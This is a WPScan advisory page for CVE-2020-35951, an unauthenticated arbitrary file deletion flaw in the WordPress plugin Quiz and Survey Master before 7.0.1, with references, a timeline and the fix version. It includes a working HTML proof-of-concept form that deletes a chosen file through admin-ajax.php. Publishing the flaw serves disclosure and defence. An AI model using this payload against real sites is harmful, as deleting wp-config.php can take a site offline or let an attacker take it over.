WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Quiz and Survey Master < 7.0.1 - Unauthenticated Arbitrary File Deletion

Description

This flaw allows users to delete arbitrary files like a site’s wp-config.php file which could effectively take a site offline and allow an attacker to take over the vulnerable site.

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://YOURURL/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="action" value="qsm_remove_file_fd_question" />
      <input type="hidden" name="file_url" value="/path/to/file" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

quiz-master-next
Fixed in version 7.0.1

References

CVE
CVE-2020-35951
URL
https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/

YouTube Video

Classification

Type

BYPASS

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified

No

WPVDB ID
2c6a695f-7eb6-4d26-9c59-7ced35cd6129

Timeline

Publicly Published

2020-08-13 (about 2 years ago)

Added

2020-08-13 (about 2 years ago)

Last Updated

2021-01-02 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin